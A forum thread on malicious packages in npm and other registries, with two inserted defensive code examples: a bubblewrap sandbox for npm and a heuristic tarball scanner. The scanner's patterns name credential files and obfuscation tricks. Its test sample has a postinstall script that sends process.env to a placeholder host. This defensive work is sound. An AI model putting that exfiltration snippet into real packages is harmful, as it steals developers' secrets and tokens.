Our package registry ecosystem has a serious problem... and not just npm.
People are aware of this but maybe this will make them a bit more aware
Yep, I've been trying to get our company to pay more attention to it. It's not just Node.js. All the new hipster languages pull in whatever they can grab. Python, Go, Ruby...
A lot of this stuff is submitted by random people that have no verified credibility. It's really worrying. I'm sure it'll take another major incident though before we'll really pay attention to it, like WannaCry/NotPetya did for SMBv1. Because the devs don't want any mitigations, it'll make their work more difficult.
> Put passphrases on all your private keys. If you're a package maintainer then stay logged-out of your accounts on npm, github, etc, at least in the CLI.
Doesn't help when burglar is already in your house.
I get npm, but is it that realistic that yum will pull down a virus? If yum could be infected, then you are either pulling down obscure packages or using a 3rd party repository. If a mainstream package could get infected, it’s just as likely to end up in the base image that you started with (ISO, docker container, etc).
This is why it's important to use containers for development - or at least SELinux on your development host machine.
Simply restrict file access of npm to its cache folders, so it cannot access your other user configuration files.
Additionally, use a host firewall like OpenSnitch to block npm from reaching any host other than npmjs.com.
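One concrete way to do the file-access restriction the comment above describes, as an added example that is not from the original thread: build a bubblewrap (`bwrap`) command line that gives `npm` a throwaway `$HOME`, so `~/.ssh`, `~/.npmrc` and `~/.aws` are simply not visible, and mounts only the project directory and a dedicated npm cache read-write. `bwrap` and the path names below are assumptions for illustration; the flags are bubblewrap's own. Network is all-or-nothing here (`--share-net` / `--unshare-all`); per-host filtering such as "npmjs.com only" is what a host firewall like OpenSnitch adds on top.

```python
"""Run npm inside a bubblewrap sandbox with a fake $HOME (added example, assumes bwrap is installed)."""
import os
import shlex
import sys


def sandbox_argv(project_dir, npm_cache, allow_network=True, npm_args=("install",)):
    """Return the argv that runs `npm <npm_args>` with:
    - system directories mounted read-only,
    - the real $HOME hidden behind an empty tmpfs (no dotfiles, no keys),
    - only project_dir and npm_cache writable,
    - network on or off as a whole (bwrap cannot filter by host)."""
    argv = ["bwrap", "--die-with-parent", "--new-session", "--unshare-all"]
    if allow_network:
        argv.append("--share-net")
    # Read-only system view; --ro-bind-try skips paths that do not exist on this host.
    for d in ("/usr", "/bin", "/lib", "/lib64", "/etc/resolv.conf", "/etc/ssl"):
        argv += ["--ro-bind-try", d, d]
    argv += [
        "--dev", "/dev", "--proc", "/proc", "--tmpfs", "/tmp",
        "--tmpfs", "/home",                              # hides the real home directory entirely
        "--bind", npm_cache, "/home/sandbox/.npm",       # the only persistent writable state
        "--bind", project_dir, project_dir,              # node_modules lands here: the blast radius
        "--chdir", project_dir,
        "--setenv", "HOME", "/home/sandbox",
        "--setenv", "npm_config_cache", "/home/sandbox/.npm",
        "--", "npm", *npm_args,
    ]
    return argv


def writable_paths(argv):
    """Paths mounted read-write (the --bind sources), for a quick audit of what npm can touch."""
    return [argv[i + 1] for i, a in enumerate(argv) if a == "--bind"]


if __name__ == "__main__":
    # Usage: python npm_sandbox.py /path/to/project [npm args...]
    project = os.path.abspath(sys.argv[1])
    cache = os.path.abspath(os.environ.get("NPM_SANDBOX_CACHE", "./.npm-sandbox-cache"))
    os.makedirs(cache, exist_ok=True)
    cmd = sandbox_argv(project, cache, npm_args=tuple(sys.argv[2:]) or ("install",))
    print(shlex.join(cmd))
    os.execvp(cmd[0], cmd)
```

Note that a malicious install script can still do anything to the project directory and the cache, and can still talk to the network when `--share-net` is given; the sandbox only keeps it away from the rest of the user's files.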
> Can't this be detected? Not really.
Contrary to OP's belief, there are tools that claim to detect such malicious packages. I wonder how effective they are.
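To make concrete what such detection tools typically look for, here is an added example (not from the thread, and not any particular tool's logic) of a heuristic scanner over an npm tarball: it flags lifecycle hooks in `package.json` and greps the shipped JavaScript for the classic exfiltration ingredients, environment harvesting plus outbound network, credential-file paths, `child_process`, and base64/eval obfuscation. The sample tarball is constructed inline and is not a real package.

```python
"""Heuristic static scan of an npm package tarball (added example)."""
import io
import json
import re
import tarfile

# Hooks that run automatically on `npm install` of a dependency.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

SUSPICIOUS = {
    "env_harvest": re.compile(r"process\.env\b"),
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "network": re.compile(r"require\(\s*['\"](?:https?|net|dgram)['\"]\s*\)|\bfetch\("),
    "credential_file": re.compile(r"\.npmrc|\.ssh|\.aws/credentials|\.docker/config\.json"),
    "obfuscation": re.compile(r"\beval\(|\bFunction\(|Buffer\.from\([^)]*['\"]base64['\"]"),
}


def scan_tarball(data: bytes) -> dict:
    """Return {'lifecycle_scripts': {hook: cmd}, 'file_hits': {path: [pattern names]}}."""
    findings = {"lifecycle_scripts": {}, "file_hits": {}}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            fh = tar.extractfile(member)
            if fh is None:
                continue
            text = fh.read().decode("utf-8", errors="replace")
            name = member.name.split("/", 1)[-1]  # npm tarballs prefix everything with "package/"
            if name == "package.json":
                scripts = json.loads(text).get("scripts", {})
                for hook in LIFECYCLE_HOOKS:
                    if hook in scripts:
                        findings["lifecycle_scripts"][hook] = scripts[hook]
            elif name.endswith((".js", ".mjs", ".cjs")):
                hits = sorted(k for k, rx in SUSPICIOUS.items() if rx.search(text))
                if hits:
                    findings["file_hits"][name] = hits
    return findings


def risk_score(findings: dict) -> int:
    """Crude weighting: install hooks are the delivery vehicle, env+network together is the exfil signature."""
    score = 3 * len(findings["lifecycle_scripts"])
    for hits in findings["file_hits"].values():
        score += len(hits)
        if "env_harvest" in hits and "network" in hits:
            score += 5
    return score


def make_sample_tarball() -> bytes:
    """Constructed sample resembling a credential-stealing package; not a real package."""
    files = {
        "package/package.json": json.dumps({
            "name": "example-pkg", "version": "1.0.0",
            "scripts": {"postinstall": "node setup.js"},
        }),
        "package/setup.js": (
            "const https = require('https');\n"
            "const body = JSON.stringify(process.env);\n"
            "https.request({host: 'example.invalid', method: 'POST'}).end(body);\n"
        ),
        "package/index.js": "module.exports = () => 'hello';\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            raw = content.encode()
            info = tarfile.TarInfo(path)
            info.size = len(raw)
            tar.addfile(info, io.BytesIO(raw))
    return buf.getvalue()


if __name__ == "__main__":
    result = scan_tarball(make_sample_tarball())
    print(json.dumps(result, indent=2), "risk:", risk_score(result))
```

The obvious weakness, and the reason the comment's skepticism is warranted, is that all of this is defeated by string splitting, dynamic `require`, or fetching the real payload at install time, which is why the sandboxing advice elsewhere in the thread matters more than any signature.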
This is a clever way to raise important issues in the security of package managers, but I can't find support for your claim that NPM doesn't let you report malware. A cursory Google search brought me this: https://docs.npmjs.com/reporting-malware-in-an-npm-package
And I confirmed that that button is indeed available on packages with a link that goes to eg https://www.npmjs.com/support?inquire=security&security-inqu...
What functionality was removed?